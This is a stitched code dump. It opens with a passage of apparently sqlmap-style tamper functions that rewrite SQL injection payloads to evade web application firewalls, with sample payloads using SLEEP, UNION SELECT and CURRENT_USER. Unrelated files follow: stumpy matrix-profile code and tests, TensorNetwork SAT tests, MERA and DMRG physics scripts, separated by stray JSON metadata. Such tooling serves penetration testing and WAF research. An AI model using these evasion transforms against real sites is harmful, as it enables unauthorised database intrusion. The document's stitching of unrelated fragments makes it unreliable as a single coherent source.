if word.upper() in self.keywords:
retVal = retVal.replace(word, word.lower())
return retVal
def least(self, payload, **kwargs):
"""
Replaces greater than operator ('>') with 'LEAST' counterpart
Tested against:
* MySQL 4, 5.0 and 5.5
* Oracle 10g
* PostgreSQL 8.3, 8.4, 9.0
Notes:
* Useful to bypass weak and bespoke web application firewalls that
filter the greater than character
* The LEAST function is widely supported across DBMSes. Hence, this
tamper script should work against the majority of databases
>>> tamper('1 AND A > B')
'1 AND LEAST(A,B+1)=B+1'
"""
retVal = payload
if payload:
match = re.search(r"(?i)(\b(AND|OR)\b\s+)([^>]+?)\s*>\s*(\w+|'[^']+')", payload)
if match:
_ = "%sLEAST(%s,%s+1)=%s+1" % (match.group(1), match.group(3), match.group(4), match.group(4))
retVal = retVal.replace(match.group(0), _)
return retVal
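# Why the rewrite preserves the predicate: for integer operands,
# LEAST(A, B+1) = B+1 holds exactly when B + 1 <= A, i.e. when A > B, so the
# original greater-than comparison is evaluated without using the '>'
# character (the GREATEST tamper later in this file uses the dual identity).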
def informationschemacomment(self, payload, **kwargs):
"""
Add an inline comment (/**/) to the end of all occurrences of (MySQL) "information_schema" identifier
>>> tamper('SELECT table_name FROM INFORMATION_SCHEMA.TABLES')
'SELECT table_name FROM INFORMATION_SCHEMA/**/.TABLES'
"""
retVal = payload
if payload:
retVal = re.sub(r"(?i)(information_schema)\.", r"\g<1>/**/.", payload)
return retVal
def ifnull2ifisnull(self, payload, **kwargs):
"""
Replaces instances like 'IFNULL(A, B)' with 'IF(ISNULL(A), B, A)' counterpart
Requirement:
* MySQL
* SQLite (possibly)
* SAP MaxDB (possibly)
Tested against:
* MySQL 5.0 and 5.5
Notes:
* Useful to bypass very weak and bespoke web application firewalls
that filter the IFNULL() function
>>> tamper('IFNULL(1, 2)')
'IF(ISNULL(1),2,1)'
"""
if payload and payload.find("IFNULL") > -1:
while payload.find("IFNULL(") > -1:
index = payload.find("IFNULL(")
depth = 1
comma, end = None, None
for i in xrange(index + len("IFNULL("), len(payload)):
if depth == 1 and payload[i] == ',':
comma = i
elif depth == 1 and payload[i] == ')':
end = i
break
elif payload[i] == '(':
depth += 1
elif payload[i] == ')':
depth -= 1
if comma and end:
_ = payload[index + len("IFNULL("):comma]
__ = payload[comma + 1:end].lstrip()
newVal = "IF(ISNULL(%s),%s,%s)" % (_, __, _)
payload = payload[:index] + newVal + payload[end + 1:]
else:
break
return payload
def ifnull2casewhenisnull(self, payload, **kwargs):
"""
Replaces instances like 'IFNULL(A, B)' with 'CASE WHEN ISNULL(A) THEN (B) ELSE (A) END' counterpart
Requirement:
* MySQL
* SQLite (possibly)
* SAP MaxDB (possibly)
Tested against:
* MySQL 5.0 and 5.5
Notes:
* Useful to bypass very weak and bespoke web application firewalls
that filter the IFNULL() functions
>>> tamper('IFNULL(1, 2)')
'CASE WHEN ISNULL(1) THEN (2) ELSE (1) END'
"""
if payload and payload.find("IFNULL") > -1:
while payload.find("IFNULL(") > -1:
index = payload.find("IFNULL(")
depth = 1
comma, end = None, None
for i in xrange(index + len("IFNULL("), len(payload)):
if depth == 1 and payload[i] == ',':
comma = i
elif depth == 1 and payload[i] == ')':
end = i
break
elif payload[i] == '(':
depth += 1
elif payload[i] == ')':
depth -= 1
if comma and end:
_ = payload[index + len("IFNULL("):comma]
__ = payload[comma + 1:end].lstrip()
newVal = "CASE WHEN ISNULL(%s) THEN (%s) ELSE (%s) END" % (_, __, _)
payload = payload[:index] + newVal + payload[end + 1:]
else:
break
return payload
def htmlencode(self, payload, **kwargs):
"""
HTML encode (using code points) all non-alphanumeric characters (e.g. ' -> ')
>>> tamper("1' AND SLEEP(5)#")
'1' AND SLEEP(5)#'
"""
return re.sub(r"[^\w]", lambda match: "&#%d;" % ord(match.group(0)), payload) if payload else payload
def hex2char(self, payload, **kwargs):
"""
Replaces each (MySQL) 0x<hex> encoded string with equivalent CONCAT(CHAR(),...) counterpart
Requirement:
* MySQL
Tested against:
* MySQL 4, 5.0 and 5.5
Notes:
* Useful in cases when the web application performs upper casing
>>> tamper('SELECT 0xdeadbeef')
'SELECT CONCAT(CHAR(222),CHAR(173),CHAR(190),CHAR(239))'
"""
retVal = payload
if payload:
for match in re.finditer(r"\b0x([0-9a-f]+)\b", retVal):
if len(match.group(1)) > 2:
result = "CONCAT(%s)" % ','.join("CHAR(%d)" % _ for _ in getOrds(decodeHex(match.group(1))))
else:
result = "CHAR(%d)" % ord(decodeHex(match.group(1)))
retVal = retVal.replace(match.group(0), result)
return retVal
def halfversionedmorekeywords(self, payload, **kwargs):
"""
Adds (MySQL) versioned comment before each keyword
Requirement:
* MySQL < 5.1
Tested against:
* MySQL 4.0.18, 5.0.22
Notes:
* Useful to bypass several web application firewalls when the
back-end database management system is MySQL
* Used during the ModSecurity SQL injection challenge,
http://modsecurity.org/demo/challenge.html
>>> tamper("value' UNION ALL SELECT CONCAT(CHAR(58,107,112,113,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,97,110,121,58)), NULL, NULL# AND 'QDWa'='QDWa")
"value'/*!0UNION/*!0ALL/*!0SELECT/*!0CONCAT(/*!0CHAR(58,107,112,113,58),/*!0IFNULL(CAST(/*!0CURRENT_USER()/*!0AS/*!0CHAR),/*!0CHAR(32)),/*!0CHAR(58,97,110,121,58)),/*!0NULL,/*!0NULL#/*!0AND 'QDWa'='QDWa"
"""
def process(match):
word = match.group('word')
if word.upper() in self.keywords and word.upper() not in IGNORE_SPACE_AFFECTED_KEYWORDS:
return match.group().replace(word, "/*!0%s" % word)
else:
return match.group()
retVal = payload
if payload:
retVal = re.sub(r"(?<=\W)(?P<word>[A-Za-z_]+)(?=\W|\Z)", process, retVal)
retVal = retVal.replace(" /*!0", "/*!0")
return retVal
def greatest(self, payload, **kwargs):
"""
Replaces greater than operator ('>') with 'GREATEST' counterpart
Tested against:
* MySQL 4, 5.0 and 5.5
* Oracle 10g
* PostgreSQL 8.3, 8.4, 9.0
Notes:
* Useful to bypass weak and bespoke web application firewalls that
filter the greater than character
* The GREATEST function is widely supported across DBMSes. Hence, this
tamper script should work against the majority of databases
>>> tamper('1 AND A > B')
'1 AND GREATEST(A,B+1)=A'
"""
retVal = payload
if payload:
match = re.search(r"(?i)(\b(AND|OR)\b\s+)([^>]+?)\s*>\s*(\w+|'[^']+')", payload)
if match:
_ = "%sGREATEST(%s,%s+1)=%s" % (match.group(1), match.group(3), match.group(4), match.group(3))
retVal = retVal.replace(match.group(0), _)
return retVal
def escapequotes(self, payload, **kwargs):
"""
Slash escape single and double quotes (e.g. ' -> \')
>>> tamper('1" AND SLEEP(5)#')
'1\\\\" AND SLEEP(5)#'
"""
return payload.replace("'", "\\'").replace('"', '\\"')
def equaltolike(self, payload, **kwargs):
"""
Replaces all occurrences of operator equal ('=') with 'LIKE' counterpart
Tested against:
* Microsoft SQL Server 2005
* MySQL 4, 5.0 and 5.5
Notes:
* Useful to bypass weak and bespoke web application firewalls that
filter the equal character ('=')
* The LIKE operator is SQL standard. Hence, this tamper script
should work against all (?) databases
>>> tamper('SELECT * FROM users WHERE id=1')
'SELECT * FROM users WHERE id LIKE 1'
"""
retVal = payload
if payload:
retVal = re.sub(r"\s*=\s*", " LIKE ", retVal)
return retVal
def concat2concatws(self, payload, **kwargs):
"""
Replaces (MySQL) instances like 'CONCAT(A, B)' with 'CONCAT_WS(MID(CHAR(0), 0, 0), A, B)' counterpart
Requirement:
* MySQL
Tested against:
* MySQL 5.0
Notes:
* Useful to bypass very weak and bespoke web application firewalls
that filter the CONCAT() function
>>> tamper('CONCAT(1,2)')
'CONCAT_WS(MID(CHAR(0),0,0),1,2)'
"""
if payload:
payload = payload.replace("CONCAT(", "CONCAT_WS(MID(CHAR(0),0,0),")
return payload
def commentbeforeparentheses(self, payload, **kwargs):
"""
Prepends (inline) comment before parentheses (e.g. ( -> /**/()
Tested against:
* Microsoft SQL Server
* MySQL
* Oracle
* PostgreSQL
Notes:
* Useful to bypass web application firewalls that block usage
of function calls
>>> tamper('SELECT ABS(1)')
'SELECT ABS/**/(1)'
"""
retVal = payload
if payload:
retVal = re.sub(r"\b(\w+)\(", r"\g<1>/**/(", retVal)
return retVal
def commalessmid(self, payload, **kwargs):
"""
Replaces (MySQL) instances like 'MID(A, B, C)' with 'MID(A FROM B FOR C)' counterpart
You should consider using the switch '--no-cast' along with this tamper script
Requirement:
* MySQL
Tested against:
* MySQL 5.0 and 5.5
>>> tamper('MID(VERSION(), 1, 1)')
'MID(VERSION() FROM 1 FOR 1)'
"""
retVal = payload
match = re.search(r"(?i)MID\((.+?)\s*,\s*(\d+)\s*\,\s*(\d+)\s*\)", payload or "")
if match:
retVal = retVal.replace(match.group(0), "MID(%s FROM %s FOR %s)" % (match.group(1), match.group(2), match.group(3)))
return retVal
def commalesslimit(self, payload, **kwargs):
"""
Replaces (MySQL) instances like 'LIMIT M, N' with 'LIMIT N OFFSET M' counterpart
Requirement:
* MySQL
Tested against:
* MySQL 5.0 and 5.5
>>> tamper('LIMIT 2, 3')
'LIMIT 3 OFFSET 2'
"""
retVal = payload
match = re.search(r"(?i)LIMIT\s*(\d+),\s*(\d+)", payload or "")
if match:
retVal = retVal.replace(match.group(0), "LIMIT %s OFFSET %s" % (match.group(2), match.group(1)))
return retVal
def charunicodeescape(self, payload, **kwargs):
"""
Unicode-escapes non-encoded characters in a given payload (not processing already encoded) (e.g. SELECT -> \u0053\u0045\u004C\u0045\u0043\u0054)
Notes:
* Useful to bypass weak filtering and/or WAFs in JSON contexts
>>> tamper('SELECT FIELD FROM TABLE')
'\\\\u0053\\\\u0045\\\\u004C\\\\u0045\\\\u0043\\\\u0054\\\\u0020\\\\u0046\\\\u0049\\\\u0045\\\\u004C\\\\u0044\\\\u0020\\\\u0046\\\\u0052\\\\u004F\\\\u004D\\\\u0020\\\\u0054\\\\u0041\\\\u0042\\\\u004C\\\\u0045'
"""
retVal = payload
if payload:
retVal = ""
i = 0
while i < len(payload):
if payload[i] == '%' and (i < len(payload) - 2) and payload[i + 1:i + 2] in string.hexdigits and payload[i + 2:i + 3] in string.hexdigits:
retVal += "\\u00%s" % payload[i + 1:i + 3]
i += 3
else:
retVal += '\\u%.4X' % ord(payload[i])
i += 1
return retVal
def charunicodeencode(self, payload, **kwargs):
"""
Unicode-URL-encodes all characters in a given payload (not processing already encoded) (e.g. SELECT -> %u0053%u0045%u004C%u0045%u0043%u0054)
Requirement:
* ASP
* ASP.NET
Tested against:
* Microsoft SQL Server 2000
* Microsoft SQL Server 2005
* MySQL 5.1.56
* PostgreSQL 9.0.3
Notes:
* Useful to bypass weak web application firewalls that do not unicode URL-decode the request before processing it through their ruleset
>>> tamper('SELECT FIELD%20FROM TABLE')
'%u0053%u0045%u004C%u0045%u0043%u0054%u0020%u0046%u0049%u0045%u004C%u0044%u0020%u0046%u0052%u004F%u004D%u0020%u0054%u0041%u0042%u004C%u0045'
"""
retVal = payload
if payload:
retVal = ""
i = 0
while i < len(payload):
if payload[i] == '%' and (i < len(payload) - 2) and payload[i + 1:i + 2] in string.hexdigits and payload[i + 2:i + 3] in string.hexdigits:
retVal += "%%u00%s" % payload[i + 1:i + 3]
i += 3
else:
retVal += '%%u%.4X' % ord(payload[i])
i += 1
return retVal
def charencode(self, payload, **kwargs):
"""
URL-encodes all characters in a given payload (not processing already encoded) (e.g. SELECT -> %53%45%4C%45%43%54)
Tested against:
* Microsoft SQL Server 2005
* MySQL 4, 5.0 and 5.5
* Oracle 10g
* PostgreSQL 8.3, 8.4, 9.0
Notes:
* Useful to bypass very weak web application firewalls that do not url-decode the request before processing it through their ruleset
* The web server will URL-decode the request anyway before passing it to the back-end, hence it should work against any DBMS
>>> tamper('SELECT FIELD FROM%20TABLE')
'%53%45%4C%45%43%54%20%46%49%45%4C%44%20%46%52%4F%4D%20%54%41%42%4C%45'
"""
retVal = payload
if payload:
retVal = ""
i = 0
while i < len(payload):
if payload[i] == '%' and (i < len(payload) - 2) and payload[i + 1:i + 2] in string.hexdigits and payload[i + 2:i + 3] in string.hexdigits:
retVal += payload[i:i + 3]
i += 3
else:
retVal += '%%%.2X' % ord(payload[i])
i += 1
return retVal
def bluecoat(self, payload, **kwargs):
"""
Replaces the space character after SQL keywords with a valid blank character ('%09'). Afterwards, replaces the character '=' with the operator LIKE
Requirement:
* Blue Coat SGOS with WAF activated as documented in
https://kb.bluecoat.com/index?page=content&id=FAQ2147
Tested against:
* MySQL 5.1, SGOS
Notes:
* Useful to bypass Blue Coat's recommended WAF rule configuration
>>> tamper('SELECT id FROM users WHERE id = 1')
'SELECT%09id FROM%09users WHERE%09id LIKE 1'
"""
def process(match):
word = match.group('word')
if word.upper() in self.keywords:
return match.group().replace(word, "%s%%09" % word)
else:
return match.group()
retVal = payload
if payload:
retVal = re.sub(r"\b(?P<word>[A-Z_]+)(?=[^\w(]|\Z)", process, retVal)
retVal = re.sub(r"\s*=\s*", " LIKE ", retVal)
retVal = retVal.replace("%09 ", "%09")
return retVal
def between(self, payload, **kwargs):
"""
Replaces greater than operator ('>') with 'NOT BETWEEN 0 AND #' and equals operator ('=') with 'BETWEEN # AND #'
Tested against:
* Microsoft SQL Server 2005
* MySQL 4, 5.0 and 5.5
* Oracle 10g
* PostgreSQL 8.3, 8.4, 9.0
Notes:
* Useful to bypass weak and bespoke web application firewalls that
filter the greater than character
* The BETWEEN clause is SQL standard. Hence, this tamper script
should work against all (?) databases
>>> tamper('1 AND A > B--')
'1 AND A NOT BETWEEN 0 AND B--'
>>> tamper('1 AND A = B--')
'1 AND A BETWEEN B AND B--'
>>> tamper('1 AND LAST_INSERT_ROWID()=LAST_INSERT_ROWID()')
'1 AND LAST_INSERT_ROWID() BETWEEN LAST_INSERT_ROWID() AND LAST_INSERT_ROWID()'
"""
retVal = payload
if payload:
match = re.search(r"(?i)(\b(AND|OR)\b\s+)(?!.*\b(AND|OR)\b)([^>]+?)\s*>\s*([^>]+)\s*\Z", payload)
if match:
_ = "%s %s NOT BETWEEN 0 AND %s" % (match.group(2), match.group(4), match.group(5))
retVal = retVal.replace(match.group(0), _)
else:
retVal = re.sub(r"\s*>\s*(\d+|'[^']+'|\w+\(\d+\))", r" NOT BETWEEN 0 AND \g<1>", payload)
if retVal == payload:
match = re.search(r"(?i)(\b(AND|OR)\b\s+)(?!.*\b(AND|OR)\b)([^=]+?)\s*=\s*([\w()]+)\s*", payload)
if match:
_ = "%s %s BETWEEN %s AND %s" % (match.group(2), match.group(4), match.group(5), match.group(5))
retVal = retVal.replace(match.group(0), _)
return retVal
def appendnullbyte(self, payload, **kwargs):
"""
Appends (Access) NULL byte character (%00) at the end of payload
Requirement:
* Microsoft Access
Notes:
* Useful to bypass weak web application firewalls when the back-end
database management system is Microsoft Access - further uses are
also possible
Reference: http://projects.webappsec.org/w/page/13246949/Null-Byte-Injection
>>> tamper('1 AND 1=1')
'1 AND 1=1%00'
"""
return "%s%%00" % payload if payload else payload
def apostrophenullencode(self, payload, **kwargs):
"""
Replaces apostrophe character (') with its illegal double unicode counterpart (e.g. ' -> %00%27)
>>> tamper("1 AND '1'='1")
'1 AND %00%271%00%27=%00%271'
"""
return payload.replace('\'', "%00%27") if payload else payload
def apostrophemask(self, payload, **kwargs):
"""
Replaces apostrophe character (') with its UTF-8 full width counterpart (e.g. ' -> %EF%BC%87)
References:
* http://www.utf8-chartable.de/unicode-utf8-table.pl?start=65280&number=128
* http://lukasz.pilorz.net/testy/unicode_conversion/
* http://sla.ckers.org/forum/read.php?13,11562,11850
* http://lukasz.pilorz.net/testy/full_width_utf/index.phps
>>> tamper("1 AND '1'='1")
'1 AND %EF%BC%871%EF%BC%87=%EF%BC%871'
"""
return payload.replace('\'', "%EF%BC%87") if payload else payload
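# A hedged usage sketch (the surrounding class and its initialization are not
# shown in this excerpt): each method above maps a payload string to a
# transformed string, so several of them can be composed on an instance of the
# tamper class, e.g.
#
#     payload = "SELECT id FROM users WHERE id = 1"
#     for name in ("lowercase", "equaltolike", "charencode"):
#         payload = getattr(self, name)(payload)
#
# which lower-cases keywords, swaps '=' for LIKE and finally URL-encodes every
# character of the result.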
``` |
{
"source": "0xflotus/stumpy",
"score": 2
} |
#### File: stumpy/stumpy/stamp.py
```python
import numpy as np
from . import core
def mass(Q, T, M_T, Σ_T, trivial_idx=None, excl_zone=0, left=False, right=False):
"""
Compute "Mueen's Algorithm for Similarity Search" (MASS)
Parameters
----------
Q : ndarray
Query array or subsequence
T : ndarray
Time series array or sequence
M_T : ndarray
Sliding mean for `T`
Σ_T : ndarray
Sliding standard deviation for `T`
trivial_idx : int
Index for the start of the trivial self-join
excl_zone : int
The half width for the exclusion zone relative to the `trivial_idx`.
If the `trivial_idx` is `None` then this parameter is ignored.
left : bool
Return the left matrix profile indices if `True`. If `right` is True
then this parameter is ignored.
right : bool
Return the right matrix profile indices if `True`
Returns
-------
P : ndarray
Matrix profile
I : ndarray
Matrix profile indices
"""
D = core.mass(Q, T, M_T, Σ_T)
if trivial_idx is not None:
zone_start = max(0, trivial_idx-excl_zone)
zone_stop = min(T.shape[0]-Q.shape[0]+1, trivial_idx+excl_zone)
D[zone_start:zone_stop] = np.inf
#Get left and right matrix profiles
IL = -1
PL = np.inf
if D[:trivial_idx].size:
IL = np.argmin(D[:trivial_idx])
PL = D[IL]
if zone_start <= IL <= zone_stop:
IL = -1
IR = -1
PR = -1
if D[trivial_idx:].size:
IR = trivial_idx + np.argmin(D[trivial_idx:])
PR = D[IR]
if zone_start <= IR <= zone_stop:
IR = -1
# Element-wise Min
I = np.argmin(D)
P = D[I]
if trivial_idx is not None and left:
I = IL
P = PL
if trivial_idx is not None and right:
I = IR
P = PR
return P, I
def stamp(T_A, T_B, m, ignore_trivial=False):
"""
Compute matrix profile and indices using the "Scalable Time series
Anytime Matrix Profile" (STAMP) algorithm and MASS (2017 - with FFT).
Parameters
----------
T_A : ndarray
The time series or sequence for which the matrix profile index will
be returned
T_B : ndarray
The time series or sequence that contains your query subsequences
m : int
Window size
ignore_trivial : bool
`True` if this is a self join and `False` otherwise (i.e., AB-join).
Returns
-------
out : ndarray
Two column numpy array where the first column is the matrix profile
and the second column is the matrix profile indices
Notes
-----
DOI: 10.1109/ICDM.2016.0179
See Table III
Time series T_B will be annotated with the distance location
(or index) of all its subsequences in another time series, T_A.
For every subsequence, Q, in T_B, you will get a distance and index for
the closest subsequence in T_A. Thus, the array returned will have length
T_B.shape[0]-m+1
"""
core.check_dtype(T_A)
core.check_dtype(T_B)
subseq_T_B = core.rolling_window(T_B, m)
excl_zone = int(np.ceil(m/2))
M_T, Σ_T = core.compute_mean_std(T_A, m)
# Add exclusionary zone
if ignore_trivial:
out = [mass(subseq, T_A, M_T, Σ_T, i, excl_zone) for i, subseq in enumerate(subseq_T_B)]
else:
out = [mass(subseq, T_A, M_T, Σ_T) for subseq in subseq_T_B]
out = np.array(out, dtype=object)
return out
```
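A minimal self-join sketch for `stamp` (illustrative; it assumes the module above is importable as `stumpy.stamp`):
```python
import numpy as np

from stumpy import stamp

T = np.random.uniform(-1, 1, 64)  # toy time series
m = 8                             # window size

# Self-join: every length-m subsequence of T is compared against T itself,
# with trivial (overlapping) matches masked out by the exclusion zone.
out = stamp.stamp(T, T, m, ignore_trivial=True)
profile, indices = out[:, 0], out[:, 1]
print(profile.shape)              # (len(T) - m + 1,)
```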
#### File: stumpy/tests/test_core.py
```python
import numpy as np
import numpy.testing as npt
from stumpy import core
import pytest
def naive_rolling_window_dot_product(Q, T):
window = len(Q)
result = np.zeros(len(T) - window + 1)
for i in range(len(result)):
result[i] = np.dot(T[i:i + window], Q)
return result
test_data = [
(np.array([-1,1,2], dtype=np.float64),np.array(range(5), dtype=np.float64)),
(np.array([9,8100,-60], dtype=np.float64), np.array([584,-11,23,79,1001], dtype=np.float64)),
(np.random.uniform(-1000, 1000, [8]), np.random.uniform(-1000, 1000, [64])),
]
@pytest.mark.parametrize("Q, T", test_data)
def test_sliding_dot_product(Q, T):
left = naive_rolling_window_dot_product(Q, T)
right = core.sliding_dot_product(Q, T)
npt.assert_almost_equal(left, right)
@pytest.mark.parametrize("Q, T", test_data)
def test_compute_mean_std(Q, T):
m = Q.shape[0]
left_μ_Q = np.sum(Q)/m
left_σ_Q = np.sqrt(np.sum(np.square(Q-left_μ_Q)/m))
left_M_T = np.mean(core.rolling_window(T, m), axis=1)
left_Σ_T = np.std(core.rolling_window(T, m), axis=1)
right_μ_Q, right_σ_Q = core.compute_mean_std(Q, m)
right_M_T, right_Σ_T = core.compute_mean_std(T, m)
npt.assert_almost_equal(left_μ_Q, right_μ_Q)
npt.assert_almost_equal(left_σ_Q, right_σ_Q)
npt.assert_almost_equal(left_M_T, right_M_T)
npt.assert_almost_equal(left_Σ_T, right_Σ_T)
@pytest.mark.parametrize("Q, T", test_data)
def test_calculate_distance_profile(Q, T):
m = Q.shape[0]
left = np.linalg.norm(core.z_norm(core.rolling_window(T, m), 1) - core.z_norm(Q), axis=1)
QT = core.sliding_dot_product(Q, T)
μ_Q, σ_Q = core.compute_mean_std(Q, m)
M_T, Σ_T = core.compute_mean_std(T, m)
right = core.calculate_distance_profile(m, QT, μ_Q, σ_Q, M_T, Σ_T)
npt.assert_almost_equal(left, right)
@pytest.mark.parametrize("Q, T", test_data)
def test_mueen_calculate_distance_profile(Q, T):
m = Q.shape[0]
left = np.linalg.norm(core.z_norm(core.rolling_window(T, m), 1) - core.z_norm(Q), axis=1)
right = core.mueen_calculate_distance_profile(Q,T)
npt.assert_almost_equal(left, right)
@pytest.mark.parametrize("Q, T", test_data)
def test_mass(Q, T):
m = Q.shape[0]
left = np.linalg.norm(core.z_norm(core.rolling_window(T, m), 1) - core.z_norm(Q), axis=1)
right = core.mass(Q, T)
npt.assert_almost_equal(left, right)
``` |
{
"source": "0xflotus/TensorNetwork",
"score": 2
} |
#### File: examples/sat/sat_tensornetwork_test.py
```python
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import tensorflow as tf
tf.enable_v2_behavior()
import tensornetwork
from examples.sat import sat_tensornetwork
class SATTensorNetworkTest(tf.test.TestCase):
def test_sanity_check(self):
net = sat_tensornetwork.sat_count_tn([
(1, 2, 3),
])
count = tensornetwork.contractors.naive(net).get_final_node().get_tensor()
self.assertEqual(count.numpy(), 7)
def test_dual_clauses(self):
net = sat_tensornetwork.sat_count_tn([
(1, 2, 3),
(1, -2, 3),
])
count = tensornetwork.contractors.naive(net).get_final_node().get_tensor()
self.assertEqual(count.numpy(), 6)
def test_all_clauses(self):
net = sat_tensornetwork.sat_count_tn([
(1, 2, 3),
(1, 2, -3),
(1, -2, 3),
(1, -2, -3),
(-1, 2, 3),
(-1, 2, -3),
(-1, -2, 3),
(-1, -2, -3),
])
count = tensornetwork.contractors.naive(net).get_final_node().get_tensor()
self.assertEqual(count.numpy(), 0)
def test_four_variables(self):
net = sat_tensornetwork.sat_count_tn([
(1, 2, 3),
(1, 2, 4),
])
count = tensornetwork.contractors.naive(net).get_final_node().get_tensor()
self.assertEqual(count.numpy(), 13)
def test_four_variables_four_clauses(self):
net = sat_tensornetwork.sat_count_tn([
(1, 2, 3),
(1, 2, 4),
(-3, -4, 2),
(-1, 3, -2),
])
count = tensornetwork.contractors.naive(net).get_final_node().get_tensor()
self.assertEqual(count.numpy(), 9)
def test_single_variable(self):
net = sat_tensornetwork.sat_count_tn([
(1, 1, 1),
])
count = tensornetwork.contractors.naive(net).get_final_node().get_tensor()
self.assertEqual(count.numpy(), 1)
def test_solutions(self):
net, edge_order = sat_tensornetwork.sat_tn([
(1, 2, -3),
])
network = tensornetwork.contractors.naive(net)
solutions_node = network.get_final_node().reorder_edges(edge_order)
solutions = solutions_node.get_tensor()
self.assertEqual(solutions.numpy()[0][0][0], 1)
# Only unaccepted value.
self.assertEqual(solutions.numpy()[0][0][1], 0)
self.assertEqual(solutions.numpy()[0][1][0], 1)
self.assertEqual(solutions.numpy()[0][1][1], 1)
self.assertEqual(solutions.numpy()[1][0][0], 1)
self.assertEqual(solutions.numpy()[1][0][1], 1)
self.assertEqual(solutions.numpy()[1][1][0], 1)
self.assertEqual(solutions.numpy()[1][1][1], 1)
if __name__ == '__main__':
tf.test.main()
```
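The expected counts in the tests above can be cross-checked with a small brute-force counter over all assignments (an independent sketch, not part of the library):
```python
from itertools import product

def brute_force_count(clauses, num_vars):
    """Count assignments satisfying every clause; literals are signed, 1-based ints."""
    count = 0
    for assignment in product([False, True], repeat=num_vars):
        if all(any(assignment[abs(lit) - 1] == (lit > 0) for lit in clause)
               for clause in clauses):
            count += 1
    return count

print(brute_force_count([(1, 2, 3)], 3))              # 7: only (F, F, F) fails
print(brute_force_count([(1, 2, 3), (1, -2, 3)], 3))  # 6, matching the dual-clause test
```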
#### File: experiments/MERA/binary_mera_example.py
```python
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
NUM_THREADS = 4
import os
os.environ['OMP_NUM_THREADS'] = str(NUM_THREADS)
os.environ["KMP_BLOCKTIME"] = "0"
os.environ["KMP_AFFINITY"] = "granularity=fine,verbose,compact,1,0"
import tensorflow as tf
import copy
import numpy as np
import time
import pickle
import experiments.MERA.binary_mera_lib as bml
import experiments.MERA.binary_mera as bm
import experiments.MERA.misc_mera as misc_mera
from sys import stdout
import datetime
config = tf.ConfigProto()
config.intra_op_parallelism_threads = NUM_THREADS
config.inter_op_parallelism_threads = 1
tf.enable_eager_execution(config)
tf.enable_v2_behavior()
def optimize_binary_mera(chis,
numiters,
noises,
opt_all_layers,
embeddings,
dtype,
nsteps_ss,
use_gpu=False):
fname = 'binary_mera_optimization'
rootdir = os.getcwd()
if not os.path.exists(fname):
os.mkdir(fname)
os.chdir(fname)
DEVICES = tf.contrib.eager.list_devices()
print("Available devices:")
for i, device in enumerate(DEVICES):
print("%d) %s" % (i, device))
CPU = '/device:CPU:0'
GPU = '/job:localhost/replica:0/task:0/device:GPU:0'
if use_gpu:
specified_device_type = GPU
name = 'GPU'
else:
specified_device_type = CPU
name = 'CPU'
with tf.device(specified_device_type):
wC, uC, _, _ = bm.run_binary_mera_optimization_TFI(
chis=chis,
niters=numiters,
embeddings=embeddings,
dtype=dtype,
verbose=1,
nsteps_steady_state=nsteps_ss,
numpy_update=True,
opt_u_after=30,
noises=noises,
opt_all_layers=opt_all_layers,
filename=None)
os.chdir(rootdir)
return wC, uC
def load_and_optimize_binary_mera(loadname,
filename,
chis,
numiters,
noises,
opt_all_layers,
embeddings,
nsteps_ss,
use_gpu=False):
with open(loadname, 'rb') as f:
wC, uC = pickle.load(f)
fname = 'binary_mera_optimization'
rootdir = os.getcwd()
if not os.path.exists(fname):
os.mkdir(fname)
os.chdir(fname)
DEVICES = tf.contrib.eager.list_devices()
print("Available devices:")
for i, device in enumerate(DEVICES):
print("%d) %s" % (i, device))
CPU = '/device:CPU:0'
GPU = '/job:localhost/replica:0/task:0/device:GPU:0'
if use_gpu:
specified_device_type = GPU
name = 'GPU'
else:
specified_device_type = CPU
name = 'CPU'
dtype = wC[-1].dtype
num_trans_layers = len(chis)
filename = str(datetime.date.today()) + filename \
+ 'resumed_bin_mera_opt_Nthreads{0}_chimax{1}_numtrans{2}_nss{3}'.format(
NUM_THREADS, max(chis), num_trans_layers + len(wC), nsteps_ss)
with tf.device(specified_device_type):
wC, uC, _, _ = bm.run_binary_mera_optimization_TFI(
chis=chis,
niters=numiters,
embeddings=embeddings,
dtype=dtype,
verbose=1,
nsteps_steady_state=nsteps_ss,
numpy_update=True,
opt_u_after=0,
noises=noises,
opt_all_layers=opt_all_layers,
wC=wC,
uC=uC,
filename=filename)
os.chdir(rootdir)
def get_scaling_dims(loadname, savename, use_gpu=False, k=11):
with open(loadname, 'rb') as f:
wC, uC = pickle.load(f)
fname = 'binary_mera_optimization'
rootdir = os.getcwd()
if not os.path.exists(fname):
os.mkdir(fname)
os.chdir(fname)
DEVICES = tf.contrib.eager.list_devices()
print("Available devices:")
for i, device in enumerate(DEVICES):
print("%d) %s" % (i, device))
CPU = '/device:CPU:0'
GPU = '/job:localhost/replica:0/task:0/device:GPU:0'
if use_gpu:
specified_device_type = GPU
name = 'GPU'
else:
specified_device_type = CPU
name = 'CPU'
filename = savename
scaling_dims = {}
# with open(filename, 'rb') as f:
# scaling_dims = pickle.load(f)
with tf.device(specified_device_type):
for n in reversed(range(len(wC) - 2, len(wC))):
print(np.array(wC[n].shape))
if not misc_mera.all_same_chi(wC[n]):
continue
scaling_dims[n] = bml.get_scaling_dimensions(wC[n], uC[n], k=k)
print(scaling_dims[n])
with open(filename, 'wb') as f:
pickle.dump(scaling_dims, f)
if __name__ == "__main__":
chis = [4, 5, 6]
numiters = [1000, 100, 400]
noises = [1E-6, 1E-6, 1E-6]
opt_all_layers = [True, True, True]
embeddings = ['a', 'a', 'a']
dtype = tf.float64
nsteps_ss = 10
num_scaling_dims = 11
wC, uC = optimize_binary_mera(
chis=chis,
numiters=numiters,
noises=noises,
opt_all_layers=opt_all_layers,
embeddings=embeddings,
dtype=dtype,
nsteps_ss=nsteps_ss,
use_gpu=False)
scaling_dims = bml.get_scaling_dimensions(
wC[-1], uC[-1], k=num_scaling_dims)
print()
print(
'first {0} eigenvalues of the ascending super-operator at bond dimension {1}:'
.format(num_scaling_dims, chis[-1]))
print(scaling_dims)
```
#### File: experiments/MPS/DMRG.py
```python
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import sys
sys.path.append('../')
import time
import ncon as ncon
import numpy as np
import tensorflow as tf
import Lanczos as LZ
from sys import stdout
import misc_mps
import functools as fct
from matrixproductstates import InfiniteMPSCentralGauge, FiniteMPSCentralGauge
class MPSSimulationBase:
def __init__(self, mps, mpo, lb, rb, name):
"""
Base class for simulation objects; upon initialization, creates all
